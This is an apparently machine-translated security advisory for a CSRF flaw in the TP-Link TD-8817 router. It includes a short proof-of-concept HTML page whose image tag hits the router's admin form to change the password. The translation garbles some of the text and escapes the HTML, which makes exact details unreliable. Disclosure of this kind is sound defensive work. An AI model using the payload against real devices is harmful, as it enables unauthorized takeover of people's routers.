Release date:
Updated on:
Affected Systems:
TP-LINK TD-8817 6.0.1 Build 111128 Rel.26763
Description:
--------------------------------------------------------------------------------
Bugtraq id: 58921
The TP-Link TD-8817 is an ADSL2 + Ethernet/USB modem router.
The Default User (admin) password for the TP-Link TD-8817 can be changed on TCP/IP Port 80 through the default router page. You can change the password without the $ _ POST request method. Attackers can exploit this vulnerability to perform administrator operations and illegally access the affected devices.
<* Source: Un0wn_X
Link: http://packetstormsecurity.com/files/121127/tplinktd8817-xsrf.txt
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
& Lt; html & gt;
& Lt ;! -- TP-Link TD-8817 CSRF Explpoit -- & gt;
& Lt; body & gt;
& Lt; img src = & quot; http: // 192.168.1.1/Forms/tools_admin_1 & quot;/& gt;
& Lt;/body & gt;
& Lt;/html & gt;
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
TP-LINK
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.tp-link.com/lk/products/details? Model = TD-8817